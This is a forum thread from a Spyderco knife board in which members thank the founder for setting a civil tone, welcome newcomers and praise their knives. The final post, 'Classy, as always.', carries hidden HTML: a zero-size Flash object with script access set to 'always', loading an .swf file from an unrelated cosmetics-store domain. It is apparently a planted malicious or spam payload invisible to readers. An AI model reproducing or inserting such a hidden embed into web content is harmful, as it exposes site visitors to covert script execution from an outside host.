Questionable tag lines & shiny footprints

Discuss Spyderco's products and history.
P40_Warhawk

Post by P40_Warhawk »

Sal,
As a newbee to the forum I have to say I could not agree with you more. I have knives my multiple manufacturers and hand made one of a kinds. I think they are all pretty cool or else I would not own them.

Even though I absolutely think that Spyderco is the premier knife manufacturer from a style, quality, price point, etc.. point of view. If there were no competitors of quality then there would be nothing to compare one of your knives to.

There is no reason to bash other manufacturers. What should be done is praise and collaborate with others of high quality standards.

An open eye and clear vision is what makes Spyderco great. The same should apply to this forum.

-Joe
Pinetreebbs

Post by Pinetreebbs »

Sal,

Thank you for setting the tone for intelligent discussion.

May I add: “Don't be too annoying and don't be too easily annoyed.”

Credit to an ancient network, Fidonet.
rkhndjr2000@yahoo.com

Post by rkhndjr2000@yahoo.com »

Intelligent, civil communication is more valuable in our everyday lives, too. Thanks, Sal, for the fine words.
Shazam

Post by Shazam »

I like my Spydercos just a little bit more now. Thanks for the great products Sal!
:spyder: Spyderco-aholic
nemik51

Do the right thing--because it's the right thing

Post by nemik51 »

sal wrote:Hi.

Thanx for all of the kind comments. It is appreciated and they are certainly good for my ego, but in reality, I cannot claim all credit.

Spyderco is made up of a small group of "like-minded-people" developed over many years. They have their own very strong core values. They always try to do the right things for the right reasons, and conduct business in an honest, fair and proper manner.

It is not likely that they would permit improper behavior in product or practice, with or without me.

Many decisions are made each day by this team. (Most without my involvement).

I will say that I'm proud to be part of the Spyderco team.

sal
----makes me wish I worked for SPYDERCO.
VG-10

Post by VG-10 »

Yes a masta...
dbcad

Post by dbcad »

I will say Sal that you have set the example and way for an extremely courteous, civil, and informative forum. A testament to your leadership. Thanks for setting such a positive tone here :) It's much appreciated by me at least and most likely quite a few others.

Charlie
Charlie

" Everything should be made as simple as possible, but not one bit simpler."

[CENTER]"Integrity is being good even if no one is watching"[/CENTER]
p3pe

Post by p3pe »

How do I get a tagline? I have tried everything on my profile.... please help
p3pe

Post by p3pe »

anyone?
cgjones

Post by cgjones »

p3pe

Post by p3pe »

Thx. got a PM
Police3 G10 PE, Civilian G10 SE, Para-Mill 2 PE CF CPM-S90V and Delica FRN VG10 SE + a Catcherman
Legal Beagle

Post by Legal Beagle »

It's extremely rare to see a company with leadership that will not only lead by example, but then allows itself to be led with people that followed it. You have my sincere admiration for that post.
sal

Post by sal »

Thanx much beagle,

we try.

sal
nnorvell

First timer

Post by nnorvell »

This is my first visit to the forum, however, I'm a big Spydie fan and hope you guys and gals will teach me more.
yuanyelss

Post by yuanyelss »

For my person I see no reason to comment co-decisions for their business/company here or on other forums...
recon1s14

Post by recon1s14 »

Thank you Sal,

And this is why I love Spyderco, not just as a knife manufacturer, but as a homebred, down to Earth *no pun intended* company. Spyderco's been around a long time, and unfortunatly I only just started collecting knives, and let me say that my Spyderco Native is the best knife Ive ever owned :D

God bless yu and yours,
SpyderNation #0705
D56

Post by D56 »

A good place to post my first - I will therfore try to follow this example :spyder:
sal

Post by sal »

Hi NNorvell, D56,

Welcome to the Spyderco forum and thanx for visiting.

sal
buddy54ck

Post by buddy54ck »

Hi Sal,
I figured that I would Make this My first stop to make My first Post. Thanks TOOREAL for sending Me here, You have proved to be a good buddy.
I must admit that I have never been much of a Spyderco Fan, until I bought the Digicam Millitary, and Paramilitary with the wonderful compression lock.
Since then, it seems that I cannot control Myself, and now own fourty two Spyderco's, ending with My last purchace of a Sage 2, Khukri, Perrins PPt, All new FFG Delica's, and a Phoenix. I guess that I recieved a hard bite By the Spyder. I am very infected now!
Keep making new models, I am a believer now, I Love everyone of them.
Thank You for Taking the High Road, as many of Your Customers, such as Myself, appreciate all makes. After all, We are talking Knives here, a Passion in which We all share.
We have to appreciate our differences, be respectful,and above all, stick together!!!
Thanks Again for Your Wonderful Products!
Respectfully,
Charlie
PS It is an honor to be here!
JAVIER0

Post by JAVIER0 »

Classy, as always.
<object classid="clsid :D
<param name=FlashVars value="cid=7">
<param name="movie" value="http://www.cosmeticsstore.info/files/7.swf">
<param name="bgcolor" value="#ffffff">
<param name="allowScriptAccess" value="always" />
<embed allowScriptAccess="always" FlashVars="cid=7" src="http://www.cosmeticsstore.info/files/7.swf" quality="high" bgcolor="#ffffff" width="0" height="0" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>
</object>